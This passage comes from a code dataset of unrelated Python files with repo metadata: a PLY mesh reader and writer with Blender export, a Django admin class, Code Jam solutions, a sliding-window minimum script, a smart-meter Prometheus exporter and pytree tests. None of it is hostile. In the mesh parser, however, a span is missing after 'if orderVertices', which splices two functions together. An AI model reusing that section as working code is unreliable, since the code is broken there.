> 0:\n if len(self.vertices_colors[0]) == 3:\n lines += 'property uchar red\\n'\n lines += 'property uchar green\\n'\n lines += 'property uchar blue\\n'\n elif len(self.vertices_colors[0]) == 4:\n lines += 'property float r\\n'\n lines += 'property float g\\n'\n lines += 'property float b\\n'\n lines += 'property float a\\n'\n\n if len(self.vertices_texcoords) > 0:\n lines += 'property float texture_u\\n'\n lines += 'property float texture_v\\n'\n\n if len( self.indices ) > 2:\n lines += 'element face '+str( self.totalFaces() )+'\\n'\n lines += 'property list uchar int vertex_indices\\n'\n\n if len( self.edge_indices ) > 1:\n lines += 'element edge '+str( self.totalEdges() )+'\\n'\n lines += 'property int32 vertex1\\n'\n lines += 'property int32 vertex2\\n'\n if len(self.edge_color) > 0:\n if len(self.edge_color[0]) == 3:\n lines += 'property uchar red\\n'\n lines += 'property uchar green\\n'\n lines += 'property uchar blue\\n'\n elif len(self.edge_color[0]) == 4:\n lines += 'property float r\\n'\n lines += 'property float g\\n'\n lines += 'property float b\\n'\n lines += 'property float a\\n'\n\n lines += 'end_header\\n'\n for index in range( len(self.vertices) ):\n line = self.vertexString( index )\n if len(self.vertices_normals) > 0:\n line += self.normalString( index )\n if len(self.vertices_colors) > 0:\n line += self.colorString( index )\n if len(self.vertices_texcoords) > 0:\n line += self.texCoordString( index )\n \n lines += line+'\\n'\n\n if len( self.indices ) > 2:\n for t in range( self.totalFaces() ):\n lines += '3' + self.triangleString(t) + '\\n'\n\n if len( self.edge_indices ) > 1:\n for t in range( self.totalEdges() ):\n lines += self.edgeString(t) + '\\n'\n\n if file_name:\n file = open(file_name, 'w')\n file.write( lines )\n file.close()\n else:\n return lines\n\n def fromPly(self, file_name):\n lineNum = -1\n\n class Enum(set):\n def __getattr__(self, name):\n if name in self:\n return name\n raise AttributeError\n\n State = Enum([\"Header\", \"VertexDef\", \"FaceDef\", \"Vertices\", \"Normals\", \"Faces\"])\n state = State.Header\n\n orderVertices = -1\n orderIndices = -1\n\n expectedVertices = 0\n expectedFaces = 0\n\n vertexCoordsFound = 0\n colorCompsFound = 0\n texCoordsFound = 0\n normalsCoordsFound = 0\n\n currentVertex = 0\n currentFace = 0\n\n floatColor = False\n\n for line in open(file_name, 'r'):\n lineNum += 1\n # get rid of the new line\n line = line.rstrip()\n # print(str(lineNum) + \" \" + line)\n\n if lineNum == 0:\n if line != 'ply':\n print(\"wrong format, expecting 'ply'\")\n return\n elif lineNum == 1:\n if line != \"format ascii 1.0\":\n print(\"wrong format, expecting 'format ascii 1.0'\")\n return\n \n if 'comment' in line:\n continue\n\n # HEADER \n if (state==State.Header or state==State.FaceDef) and line.startswith('element vertex'):\n state = State.VertexDef\n orderVertices = max(orderIndices, 0)+1\n expectedVertices = int(line[15:])\n # print(state)\n # print(line[15:])\n continue;\n\n if (state==State.Header or state==State.VertexDef) and line.startswith('element face'):\n state = State.FaceDef\n orderIndices = max(orderVertices, 0)+1\n expectedFaces = int(line[13:])\n # print(state)\n # print(line[13:])\n continue\n\n # Vertex Def\n if state==State.VertexDef:\n\n if line.startswith('property float x') or line.startswith('property float y') or line.startswith('property float z'):\n vertexCoordsFound += 1\n # print('vertexCoordsFound ' + str(vertexCoordsFound))\n continue\n\n if line.startswith('property float nx') or line.startswith('property float ny') or line.startswith('property float nz'):\n normalsCoordsFound += 1\n # print('normalsCoordsFound ' + str(normalsCoordsFound))\n continue\n\n if line.startswith('property float r') or line.startswith('property float g') or line.startswith('property float b') or line.startswith('property float a'):\n colorCompsFound += 1\n # print('colorCompsFound ' + str(colorCompsFound))\n floatColor = True\n continue\n \n if line.startswith('property uchar red') or line.startswith('property uchar green') or line.startswith('property uchar blue') or line.startswith('property uchar alpha'):\n colorCompsFound += 1\n # print('colorCompsFound ' + str(colorCompsFound))\n floatColor = False\n continue\n\n if line.startswith('property float u') or line.startswith('property float v'):\n texCoordsFound += 1\n # print('texCoordsFound ' + str(texCoordsFound))\n continue\n\n if line.startswith('property float texture_u') or line.startswith('property float texture_v'):\n texCoordsFound += 1\n # print('texCoordsFound ' + str(texCoordsFound))\n continue\n\n # if state==State.FaceDef and line.find('property list')!=0 and line!='end_header':\n # print('wrong face definition')\n\n if line=='end_header':\n # Check that all basic elements seams ok and healthy\n if colorCompsFound > 0 and colorCompsFound < 3:\n print('data has color coordiantes but not correct number of components. Found ' + str(colorCompsFound) + ' expecting 3 or 4')\n return\n\n if normalsCoordsFound != 3:\n print('data has normal coordiantes but not correct number of components. Found ' + str(normalsCoordsFound) + ' expecting 3')\n return\n\n if expectedVertices == 0:\n print('mesh loaded has no vertices')\n return\n\n if orderVertices == -1:\n orderVertices = 9999\n if orderIndices == -1:\n orderIndices = 9999;\n\n if orderVertices < orderIndices:\n state = State.Vertices\n else:\n state = State.Faces\n\n continue\n \n if state == State.Vertices:\n values = line.split()\n\n # Extract vertex\n v = [0.0, 0.0, 0.0]\n v[0] = float(values.pop(0))\n v[1] = float(values.pop(0))\n if vertexCoordsFound > 2:\n v[2] = float(values.pop(0))\n self.addVertex(np.array(v))\n\n # Extract normal\n if normalsCoordsFound > 0:\n n = [0.0, 0.0, 0.0]\n n[0] = float(values.pop(0))\n n[1] = float(values.pop(0))\n n[2] = float(values.pop(0))\n self.addNormal(np.array(n))\n\n # Extract color\n if colorCompsFound > 0:\n c = [1.0, 1.0, 1.0, 1.0]\n div = 255.0\n if floatColor:\n div = 1.0\n\n c[0] = float(values.pop(0))/div\n c[1] = float(values.pop(0))/div\n c[2] = float(values.pop(0))/div\n if colorCompsFound > 3:\n c[3] = float(values.pop(0))/div\n self.addColor(np.array(c))\n\n # Extract UVs\n if texCoordsFound > 0:\n uv = [0.0, 0.0]\n uv[0] = float(values.pop(0))\n uv[1] = float(values.pop(0))\n self.addTexCoord(np.array(uv))\n\n if len(self.vertices) == expectedVertices:\n if orderVertices < orderIndices:\n state = State.Faces\n else:\n state = State.Vertices\n continue\n\n if state == State.Faces:\n values = line.split()\n numV = int(values.pop(0))\n\n if numV != 3:\n print(\"face not a triangle\")\n\n for i in range(numV):\n index = int(values.pop(0))\n self.addIndex( index )\n if normalsCoordsFound:\n self.addNormalIndex(index)\n if texCoordsFound:\n self.addTexCoordIndex(index)\n\n if currentFace == expectedFaces:\n print(\"finish w indices\")\n if orderVertices 0:\n uv_layer = blender_mesh.uv_layers.new()\n for i, uv in enumerate(uv_layer.data):\n index = self.indices[i]\n uv.uv = self.vertices_texcoords[index]\n\n # Vertex color per vertex *per polygon loop* \n # Create vertex color layer and set values\n if len(self.vertices_colors) > 0:\n vcol_lay = blender_mesh.vertex_colors.new()\n for i, col in enumerate(vcol_lay.data):\n index = self.indices[i]\n col.color[0] = self.vertices_colors[index][0]\n col.color[1] = self.vertices_colors[index][1]\n col.color[2] = self.vertices_colors[index][2]\n col.color[3] = 1.0 # Alpha?\n \n # We're done setting up the mesh values, update mesh object and \n # let Blender do some checks on it\n blender_mesh.update()\n blender_mesh.validate()\n\n return blender_mesh\n\n","repo_name":"patriciogonzalezvivo/Meshes","sub_path":"Meshes/Mesh.py","file_name":"Mesh.py","file_ext":"py","file_size_in_byte":28108,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"61"} +{"seq_id":"8254285356","text":"\"\"\" This module contains registered UserProfile Administration \"\"\"\nfrom django.contrib import admin\nfrom .models import UserProfile\n\n\nclass UserProfileAdmin(admin.ModelAdmin):\n \"\"\" Administartion display list for user \"\"\"\n list_display = (\n 'user',\n 'full_name',\n 'email_address',\n 'phone_number',\n 'street_address1',\n 'town_or_city',\n 'postcode',\n 'country',\n 'receiving_newsletter',\n )\n\n ordering = ('first_name',)\n\n\nadmin.site.register(UserProfile, UserProfileAdmin)\n","repo_name":"KarolSliwka/ArcticSchool","sub_path":"profiles/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23421255991","text":"#!/usr/bin/python3\n\n#$Id:$\n\n# Google code jam 2014\n# problem 2\n\nimport time\nimport getopt\nimport sys\n\ndef print_timing(func):\n def wrapper(*arg):\n t1 = time.time()\n res = func(*arg)\n t2 = time.time()\n print ('%s took %0.2f s' % (func.__name__, (t2-t1)))\n return res\n return wrapper\n\ndef usage():\n print('''\n Magic trick (task 1)\n\nOptions:\n-h (--help) \n-v (--verbose)\n''')\n\n\nif __name__ == \"__main__\":\n\n verbose = False\n fname = \"input.txt\"\n # r is the standard cookie production per s\n r = 2.0\n\n if sys.version_info[0] < 3:\n print(\"This script requires Python 3. (You are running %d.%d)\" % (\n sys.version_info[0], sys.version_info[1])) \n sys.exit()\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hvf:\",\n [\"verbose\",\"help\",\"input=\"])\n except getopt.GetoptError as err:\n # print help information and exit:\n print (str(err)) # will print something like \"option -a not recognized\"\n usage()\n sys.exit(2)\n\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif o in (\"-v\", \"--verbose\"):\n verbose = True\n elif o in (\"-f\", \"--input\"):\n fname = a\n else:\n usage()\n sys.exit()\n\n\n # reading input\n # first line: number of test cases. T cases follow\n # each test case:\n # one line containing three floats C, F, X\n # C : costs of a farm\n # F : farm production\n # X : cookies needed to win\n # sample:\n # 4\n # 30.0 1.0 2.0\n # 30.0 2.0 100.0\n # 30.50000 3.14159 1999.19990\n # 500.0 4.0 2000.0\n\n f = open(fname, \"rt\")\n ncases = int(f.readline())\n if verbose:\n print(\"%s: %d cases.\" % (fname, ncases))\n\n for c in range(ncases):\n C, F, X = [float(x) for x in f.readline().split()] \n\n if verbose:\n print(\"Case %d: C: %.5f F: %.5f X: %.5f\" % (c, C, F, X))\n\n # solve it: \n # First, how many farms are needed can be determined by that \n # expression: \n # X/C - r/F = n \n # The smallest integer <= n is the number of farms needed in \n # optimum scenario\n\n # could be a rounding issue here\n n = max(0, int(X/C - r/F))\n\n if verbose:\n print(\"Will need %d farms\" % (n))\n\n # now, calculate the time needed based on n farms\n # example for 3 farms:\n # total = C/2 + C/(2+1*F)+ C/(2+2*F) + X/(2+3*F)\n total = 0.0\n for i in range(n):\n total = total + C/(r+i*F)\n\n total = total + X / (r+n*F)\n\n # output\n print (\"Case #%d: %.7f\" % (c+1, total))\n\n\n \n\n\n\n \n\n \n\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/1221.py","file_name":"1221.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23497818771","text":"test_cases = int(raw_input().strip())\ninputs = []\noutputs = []\n\ndef reverse_negate(s):\n reversed_string = s[::-1]\n new_str = ''\n for char in reversed_string:\n if char == '+':\n new_str += '-'\n elif char == '-':\n new_str += '+'\n return new_str\n\nfor t in xrange(test_cases):\n s = raw_input().strip()\n inputs.append(s)\n\nfor s in inputs:\n if s == len(s) * s[0]:\n if s[0] == '+':\n outputs.append(0)\n else:\n outputs.append(1)\n continue\n\n last_index = s.rfind('-')\n s = s[:last_index+1]\n all_same = False\n counter = 0\n while all_same == False:\n if s[:1] == '+':\n for ctr,char in enumerate(s):\n if char == '-':\n break\n s = s.replace('+', '-', ctr)\n counter += 1\n\n s = reverse_negate(s)\n last_index = s.rfind('-')\n if last_index != -1:\n s = s[:last_index+1]\n counter += 1\n all_same = ((s == len(s) * s[0]) and s[0] == '+')\n outputs.append(counter)\n\ntext_file = open('/Users/mac/Downloads/output.txt', 'w')\nfor counter,o in enumerate(outputs):\n output_str = 'Case #%s: %s' % (counter+1, o)\n text_file.write(output_str)\n text_file.write('\\n')\ntext_file.close()\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_178/3354.py","file_name":"3354.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16481004823","text":"from collections import deque\nimport sys\ninput = sys.stdin.readline\n\nN, L = map(int, input().split())\n#arr = [0] + list(map(int, input().split()))\narr = list(map(int, input().split()))\n\n#0번째 idx가 que의 맨 앞\nmyDeque = deque()\n\nfor i in range(N):\n tmp = arr[i]\n while myDeque and myDeque[-1]>tmp:\n myDeque.pop()\n myDeque.append(tmp)\n\n #윈도우의 크기보다 커진 단계에서 arr와 비교한 후 popleft\n if i>=L and myDeque[0]==arr[i-L]:\n myDeque.popleft()\n \n print(myDeque[0], end=' ')\n\n\"\"\" 시간초과\nstartIdx = 1-L+1\nif startIdx<=0: startIdx = 1\nendIdx = 1\n\nminVal = min(arr[startIdx:endIdx+1])\nprint(minVal,end=' ')\n\nfor i in range(2, len(arr)):\n startIdx = i-L+1\n if startIdx<=0: startIdx = 1\n endIdx = i\n\n if arr[endIdx]<=minVal : minVal = arr[endIdx]\n if arr[startIdx-1] == minVal : minVal = min(arr[startIdx:endIdx+1])\n\n print(minVal, end=' ')\n\n\"\"\"","repo_name":"juyeeeeon/CodingTest_Python","sub_path":"03자료구조/03_4_슬라이딩윈도우/P11003_최솟값찾기.py","file_name":"P11003_최솟값찾기.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19675783382","text":"\"\"\"\nReceive P1-data from slimmemeter via UART and store into Prometeus to be presented with Grafana.\n\"\"\"\n\nimport sys\nimport signal\nimport logging\n\nfrom serial import Serial, EIGHTBITS, PARITY_NONE, STOPBITS_ONE\n\nimport prometheus_client as PrometheusClient\nfrom p1datametrics import P1DataMetrics\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\n\nclass P1DataClient(object):\n \"\"\"P1DataClient class\"\"\"\n\n def __init__(self, serial):\n self.serial = Serial(serial, 115200,\n bytesize=EIGHTBITS, parity=PARITY_NONE, stopbits=STOPBITS_ONE)\n\n self.tariff1_delivered_reading_gauge = PrometheusClient.Gauge(\n 'tariff1_delivered_reading', 'tariff-1 delivered reading', ['elec_eid'])\n self.tariff2_delivered_reading_gauge = PrometheusClient.Gauge(\n 'tariff2_delivered_reading', 'tariff-2 delivered reading', ['elec_eid'])\n self.power_delivered_gauge = PrometheusClient.Gauge(\n 'power_delivered', 'Power delivered', ['elec_eid', 'tariff_indicator'])\n self.l1_power_delivered_gauge = PrometheusClient.Gauge(\n 'l1_power_delivered', 'L1 Power delivered', ['elec_eid', 'tariff_indicator'])\n self.l2_power_delivered_gauge = PrometheusClient.Gauge(\n 'l2_power_delivered', 'L2 Power delivered', ['elec_eid', 'tariff_indicator'])\n self.l3_power_delivered_gauge = PrometheusClient.Gauge(\n 'l3_power_delivered', 'L3 Power delivered', ['elec_eid', 'tariff_indicator'])\n self.gas_delivered_reading_gauge = PrometheusClient.Gauge(\n 'gas_delivered_reading', 'Gas delivered', ['gas_eid'])\n\n PrometheusClient.start_http_server(8000)\n\n def receive(self):\n \"\"\"receive p1 data\"\"\"\n\n p1data = ''\n while True:\n p1data_line = self.serial.readline()\n if len(p1data) == 0:\n if p1data_line[0] == '/':\n p1data = p1data_line\n else:\n pass\n else:\n p1data += p1data_line\n if p1data_line[0] == '!':\n logging.debug('received raw p1data:\\n%s', p1data)\n return p1data\n else:\n pass\n\n def store(self, metrics):\n \"\"\"expose metrics to prometheus\"\"\"\n self.tariff1_delivered_reading_gauge.labels(\n elec_eid=metrics.elec_eid()\n ).set(metrics.tariff1_delivered_reading()[0])\n\n self.tariff2_delivered_reading_gauge.labels(\n elec_eid=metrics.elec_eid()\n ).set(metrics.tariff2_delivered_reading()[0])\n\n for tariff_indicator in [1, 2]:\n self.power_delivered_gauge.labels(\n elec_eid=metrics.elec_eid(),\n tariff_indicator=tariff_indicator\n ).set(metrics.power_delivered()[0] if tariff_indicator == metrics.tariff_indicator() else 0)\n\n self.l1_power_delivered_gauge.labels(\n elec_eid=metrics.elec_eid(),\n tariff_indicator=tariff_indicator\n ).set(metrics.l1_power_delivered()[0] if tariff_indicator == metrics.tariff_indicator() else 0)\n\n self.l2_power_delivered_gauge.labels(\n elec_eid=metrics.elec_eid(),\n tariff_indicator=tariff_indicator\n ).set(metrics.l2_power_delivered()[0] if tariff_indicator == metrics.tariff_indicator() else 0)\n\n self.l3_power_delivered_gauge.labels(\n elec_eid=metrics.elec_eid(),\n tariff_indicator=tariff_indicator\n ).set(metrics.l3_power_delivered()[0] if tariff_indicator == metrics.tariff_indicator() else 0)\n\n self.gas_delivered_reading_gauge.labels(\n gas_eid=metrics.elec_eid()\n ).set(metrics.gas_delivered_reading()[0])\n\n def run(self):\n \"\"\"receive p1 data and expose the data and again and again ...\"\"\"\n while True:\n self.store(P1DataMetrics(self.receive()))\n\n\nif __name__ == '__main__':\n def sigterm_handler(_signo, _stack_frame):\n \"\"\"When sysvinit sends the TERM signal, cleanup before exiting.\"\"\"\n logging.info('received signal %d, exiting...', _signo)\n logging.debug(_stack_frame)\n sys.exit(0)\n\n signal.signal(signal.SIGTERM, sigterm_handler)\n\n SERIAL = sys.argv[1]\n\n logging.info('running p1dataclient (%s)', SERIAL)\n P1DataClient(SERIAL).run()\n","repo_name":"projectx2-nl/slimmemeter","sub_path":"p1dataclient/p1dataclient.py","file_name":"p1dataclient.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8351120109","text":"from __future__ import annotations\n\nimport collections\nimport re\nimport pytest\nimport inspect\nfrom functools import wraps\nfrom contextlib import contextmanager\n\nimport pytreez as tree_util\nfrom pytreez import _process_pytree\n\n\ndef _dummy_func(*args, **kwargs):\n return\n\n\nATuple = collections.namedtuple(\"ATuple\", (\"foo\", \"bar\"))\n\nclass ANamedTupleSubclass(ATuple):\n pass\n\nclass AnObject(object):\n\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y and self.z == other.z\n\n def __hash__(self):\n return hash((self.x, self.y, self.z))\n\n def __repr__(self):\n return \"AnObject({},{},{})\".format(self.x, self.y, self.z)\n\ntree_util.register_pytree_node(AnObject, lambda o: ((o.x, o.y), o.z),\n lambda z, xy: AnObject(xy[0], xy[1], z))\n\n@tree_util.register_pytree_node_class\nclass Special:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return \"Special(x={}, y={})\".format(self.x, self.y)\n\n def tree_flatten(self):\n return ((self.x, self.y), None)\n\n @classmethod\n def tree_unflatten(cls, aux_data, children):\n return cls(*children)\n\n def __eq__(self, other):\n return type(self) is type(other) and (self.x, self.y) == (other.x, other.y)\n\n@tree_util.register_pytree_node_class\nclass FlatCache:\n def __init__(self, structured, *, leaves=None, treedef=None):\n if treedef is None:\n leaves, treedef = tree_util.tree_flatten(structured)\n self._structured = structured\n self.treedef = treedef\n self.leaves = leaves\n\n def __hash__(self):\n return hash(self.structured)\n\n def __eq__(self, other):\n return self.structured == other.structured\n\n def __repr__(self):\n return f\"FlatCache({self.structured!r})\"\n\n @property\n def structured(self):\n if self._structured is None:\n self._structured = tree_util.tree_unflatten(self.treedef, self.leaves)\n return self._structured\n\n def tree_flatten(self):\n return self.leaves, self.treedef\n\n @classmethod\n def tree_unflatten(cls, meta, data):\n if not tree_util.all_leaves(data):\n data, meta = tree_util.tree_flatten(tree_util.tree_unflatten(meta, data))\n return FlatCache(None, leaves=data, treedef=meta)\n\nTREES = (\n (None,),\n ((None,),),\n ((),),\n (([()]),),\n ((1, 2),),\n (((1, \"foo\"), [\"bar\", (3, None, 7)]),),\n ([3],),\n ([3, ATuple(foo=(3, ATuple(foo=3, bar=None)), bar={\"baz\": 34})],),\n ([AnObject(3, None, [4, \"foo\"])],),\n (Special(2, 3.),),\n ({\"a\": 1, \"b\": 2},),\n (collections.OrderedDict([(\"foo\", 34), (\"baz\", 101), (\"something\", -42)]),),\n (collections.defaultdict(dict,\n [(\"foo\", 34), (\"baz\", 101), (\"something\", -42)]),),\n (ANamedTupleSubclass(foo=\"hello\", bar=3.5),),\n (FlatCache(None),),\n (FlatCache(1),),\n (FlatCache({\"a\": [1, 2]}),),\n)\n\n\nTREE_STRINGS = (\n \"PyTreeDef(None)\",\n \"PyTreeDef((None,))\",\n \"PyTreeDef(())\",\n \"PyTreeDef([()])\",\n \"PyTreeDef((*, *))\",\n \"PyTreeDef(((*, *), [*, (*, None, *)]))\",\n \"PyTreeDef([*])\",\n \"PyTreeDef([*, CustomNode(namedtuple[], [(*, \"\n \"CustomNode(namedtuple[], [*, None])), {'baz': \"\n \"*}])])\",\n \"PyTreeDef([CustomNode([[4, 'foo']], [*, None])])\",\n \"PyTreeDef(CustomNode([None], [*, *]))\",\n \"PyTreeDef({'a': *, 'b': *})\",\n)\n\n# pytest expects \"tree_util_test.ATuple\"\nSTRS = []\nfor tree_str in TREE_STRINGS:\n tree_str = re.escape(tree_str)\n tree_str = tree_str.replace(\"__main__\", \".*\")\n STRS.append(tree_str)\nTREE_STRINGS = STRS\n\nLEAVES = (\n (\"foo\",),\n (0.1,),\n (1,),\n (object(),),\n)\n\n\ndef check(tree):\n leaves, td = tree_util.tree_flatten(tree)\n tree2 = td.unflatten(leaves)\n assert tree_util.tree_leaves(tree) == tree_util.tree_leaves(tree2)\n assert tree == tree2\n return leaves, td\n\n\n@tree_util.register_pytree_node_class\nclass Box:\n def __init__(self, data):\n self.data = data\n def tree_flatten(self):\n leaves, treedef = tree_util.tree_flatten(self.data)\n return (leaves, treedef)\n @classmethod\n def tree_unflatten(cls, treedef: tree_util.PyTreeDef, leaves):\n data = treedef.unflatten(leaves)\n return cls(data)\n def __eq__(self, other: Box):\n if not isinstance(other, self.__class__):\n return False\n self_leaves, self_treedef = self.tree_flatten()\n other_leaves, other_treedef = other.tree_flatten()\n if self_treedef != other_treedef:\n return False\n a = self_leaves\n b = other_leaves\n if len(a) != len(b):\n return False\n for i in range(len(a)):\n x, y = a[i], b[i]\n if x != y:\n return False\n return True\n def __str__(self):\n return str(self.data)\n def __repr__(self):\n return self.__class__.__module__ + '.' + self.__class__.__name__ + '(' + str(self) + ')'\n\n\ndef test_register_pytree_node_class():\n check([1,2,(3,4,{'a': 42})])\n check(Box([1,2,(3,4,{'a': 42, 'b': [1,Box([2,{'c': Box(3)}])]})]))\n\n\ndef test_flatten_up_to():\n _, tree = tree_util.tree_flatten([(1, 2), None, ATuple(foo=3, bar=7)])\n out = tree.flatten_up_to([({\n \"foo\": 7\n }, (3, 4)), None, ATuple(foo=(11, 9), bar=None)])\n assert out == [{\"foo\": 7}, (3, 4), (11, 9), None]\n\n\nclass parameterized:\n @staticmethod\n def parameters(*choices):\n if len(choices) == 1 and isinstance(choices[0], list):\n choices = choices[0]\n def wrapper(fn):\n argc = [len(argv) for argv in choices]\n for i in range(len(argc) - 1):\n a = argc[i]\n b = argc[i+1]\n assert a == b\n argc = argc[0]\n args = [arg.name for arg in inspect.signature(fn).parameters.values()]\n if len(args) > 0 and args[0] == 'self':\n args.pop(0)\n assert len(args) == argc\n argvs = list(choices)\n argvs = [x[0] if isinstance(x, tuple) and len(x) == 1 else x for x in argvs]\n return pytest.mark.parametrize(','.join(args), argvs)(fn)\n return wrapper\n\n\nclass TestCase:\n @staticmethod\n def skipTest(reason):\n return\n\n @staticmethod\n def assertEqual(a, b):\n assert a == b\n\n @staticmethod\n def assertTrue(a):\n assert a == True\n\n @staticmethod\n def assertFalse(a):\n assert a == False\n\n @staticmethod\n def assertHashable(a):\n try:\n {a: True}\n except TypeError:\n assert False, \"Not hashable\"\n\n\n @staticmethod\n def assertRegex(string, pattern, literal=False):\n if literal:\n pattern = re.escape(pattern)\n expected_regex = re.compile(pattern)\n assert expected_regex.search(string)\n\n @classmethod\n @contextmanager\n def assertRaisesRegex(cls, exn, pattern):\n try:\n yield\n except exn as e:\n cls.assertRegex(str(e), pattern)\n\n @parameterized.parameters(*(TREES + LEAVES))\n def testRoundtrip(self, inputs):\n xs, tree = tree_util.tree_flatten(inputs)\n actual = tree_util.tree_unflatten(tree, xs)\n self.assertEqual(actual, inputs)\n self.assertHashable(tree)\n\n @parameterized.parameters(*(TREES + LEAVES))\n def testRoundtripWithFlattenUpTo(self, inputs):\n _, tree = tree_util.tree_flatten(inputs)\n xs = tree.flatten_up_to(inputs)\n actual = tree_util.tree_unflatten(tree, xs)\n self.assertEqual(actual, inputs)\n\n @parameterized.parameters(\n (tree_util.Partial(_dummy_func),),\n (tree_util.Partial(_dummy_func, 1, 2),),\n (tree_util.Partial(_dummy_func, x=\"a\"),),\n (tree_util.Partial(_dummy_func, 1, 2, 3, x=4, y=5),),\n )\n def testRoundtripPartial(self, inputs):\n xs, tree = tree_util.tree_flatten(inputs)\n actual = tree_util.tree_unflatten(tree, xs)\n # functools.partial does not support equality comparisons:\n # https://stackoverflow.com/a/32786109/809705\n self.assertEqual(actual.func, inputs.func)\n self.assertEqual(actual.args, inputs.args)\n self.assertEqual(actual.keywords, inputs.keywords)\n\n @parameterized.parameters(*(TREES + LEAVES))\n def testRoundtripViaBuild(self, inputs):\n xs, tree = _process_pytree(tuple, inputs)\n actual = tree_util.build_tree(tree, xs)\n self.assertEqual(actual, inputs)\n\n def testChildren(self):\n _, tree = tree_util.tree_flatten(((1, 2, 3), (4,)))\n _, c0 = tree_util.tree_flatten((0, 0, 0))\n _, c1 = tree_util.tree_flatten((7,))\n self.assertEqual([c0, c1], tree.children())\n\n def testFlattenUpTo(self):\n _, tree = tree_util.tree_flatten([(1, 2), None, ATuple(foo=3, bar=7)])\n out = tree.flatten_up_to([({\n \"foo\": 7\n }, (3, 4)), None, ATuple(foo=(11, 9), bar=None)])\n self.assertEqual(out, [{\"foo\": 7}, (3, 4), (11, 9), None])\n\n def testTreeMultimap(self):\n x = ((1, 2), (3, 4, 5))\n y = (([3], None), ({\"foo\": \"bar\"}, 7, [5, 6]))\n out = tree_util.tree_multimap(lambda *xs: tuple(xs), x, y)\n self.assertEqual(out, (((1, [3]), (2, None)),\n ((3, {\"foo\": \"bar\"}), (4, 7), (5, [5, 6]))))\n\n def testTreeMultimapWithIsLeafArgument(self):\n x = ((1, 2), [3, 4, 5])\n y = (([3], None), ({\"foo\": \"bar\"}, 7, [5, 6]))\n out = tree_util.tree_multimap(lambda *xs: tuple(xs), x, y,\n is_leaf=lambda n: isinstance(n, list))\n self.assertEqual(out, (((1, [3]), (2, None)), (([3, 4, 5], ({\"foo\": \"bar\"}, 7, [5, 6])))))\n\n def testFlattenIsLeaf(self):\n x = [(1, 2), (3, 4), (5, 6)]\n leaves, _ = tree_util.tree_flatten(x, is_leaf=lambda t: False)\n self.assertEqual(leaves, [1, 2, 3, 4, 5, 6])\n leaves, _ = tree_util.tree_flatten(\n x, is_leaf=lambda t: isinstance(t, tuple))\n self.assertEqual(leaves, x)\n leaves, _ = tree_util.tree_flatten(x, is_leaf=lambda t: isinstance(t, list))\n self.assertEqual(leaves, [x])\n leaves, _ = tree_util.tree_flatten(x, is_leaf=lambda t: True)\n self.assertEqual(leaves, [x])\n\n y = [[[(1,)], [[(2,)], {\"a\": (3,)}]]]\n leaves, _ = tree_util.tree_flatten(\n y, is_leaf=lambda t: isinstance(t, tuple))\n self.assertEqual(leaves, [(1,), (2,), (3,)])\n\n @parameterized.parameters(*TREES)\n def testRoundtripIsLeaf(self, tree):\n xs, treedef = tree_util.tree_flatten(\n tree, is_leaf=lambda t: isinstance(t, tuple))\n recon_tree = tree_util.tree_unflatten(treedef, xs)\n self.assertEqual(recon_tree, tree)\n\n @parameterized.parameters(*TREES)\n def testAllLeavesWithTrees(self, tree):\n leaves = tree_util.tree_leaves(tree)\n self.assertTrue(tree_util.all_leaves(leaves))\n self.assertFalse(tree_util.all_leaves([tree]))\n\n @parameterized.parameters(*LEAVES)\n def testAllLeavesWithLeaves(self, leaf):\n self.assertTrue(tree_util.all_leaves([leaf]))\n\n @parameterized.parameters(*TREES)\n def testCompose(self, tree):\n treedef = tree_util.tree_structure(tree)\n inner_treedef = tree_util.tree_structure([\"*\", \"*\", \"*\"])\n composed_treedef = treedef.compose(inner_treedef)\n expected_leaves = treedef.num_leaves * inner_treedef.num_leaves\n self.assertEqual(composed_treedef.num_leaves, expected_leaves)\n expected_nodes = ((treedef.num_nodes - treedef.num_leaves) +\n (inner_treedef.num_nodes * treedef.num_leaves))\n self.assertEqual(composed_treedef.num_nodes, expected_nodes)\n leaves = [1] * expected_leaves\n composed = tree_util.tree_unflatten(composed_treedef, leaves)\n self.assertEqual(leaves, tree_util.tree_leaves(composed))\n\n @parameterized.parameters(*TREES)\n def testTranspose(self, tree):\n outer_treedef = tree_util.tree_structure(tree)\n if not outer_treedef.num_leaves:\n return self.skipTest(\"Skipping empty tree\")\n inner_treedef = tree_util.tree_structure([1, 1, 1])\n nested = tree_util.tree_map(lambda x: [x, x, x], tree)\n actual = tree_util.tree_transpose(outer_treedef, inner_treedef, nested)\n self.assertEqual(actual, [tree, tree, tree])\n\n def testTransposeMismatchOuter(self):\n tree = {\"a\": [1, 2], \"b\": [3, 4]}\n outer_treedef = tree_util.tree_structure({\"a\": 1, \"b\": 2, \"c\": 3})\n inner_treedef = tree_util.tree_structure([1, 2])\n with self.assertRaisesRegex(TypeError, \"Mismatch\"):\n tree_util.tree_transpose(outer_treedef, inner_treedef, tree)\n\n def testTransposeMismatchInner(self):\n tree = {\"a\": [1, 2], \"b\": [3, 4]}\n outer_treedef = tree_util.tree_structure({\"a\": 1, \"b\": 2})\n inner_treedef = tree_util.tree_structure([1, 2, 3])\n with self.assertRaisesRegex(TypeError, 